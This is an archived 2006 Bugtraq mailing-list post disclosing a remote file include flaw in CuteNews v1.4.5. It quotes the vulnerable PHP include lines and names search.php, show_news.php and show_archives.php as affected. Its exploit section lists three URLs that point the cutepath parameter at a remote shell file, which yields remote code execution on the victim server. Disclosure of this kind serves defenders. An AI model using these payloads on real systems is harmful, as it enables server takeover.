lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <BAY12-F2513C473246980BFE36553F5E70@phx.gbl>
Date: Sun, 26 Nov 2006 23:08:49 +0000
From: "philip anselmo" <spoonman500@...mail.com>
To: bugtraq@...urityfocus.com
Subject: CuteNews v1.4.5 (search.php) Remote file include vulnerability

Title : CuteNews v1.4.5 (search.php) Remote file include
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
**********
http://cutephp.com/

Affected software description :
******************************
vendor site: http://cutephp.com/
Application : CuteNews v1.4.5
Catégorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
require_once("$cutepath/inc/functions.inc.php");
require_once("$cutepath/data/config.php");

affected file: search.php & show_news.php & show_archives.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?

------------------------------------------------------------------------
----

greetz: 
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my 
friends

Special Greeting:AsbMay's Group & TrYaG TeaM

channel:www.asb-may.net & www.tryag.com

contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@...mail.com

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ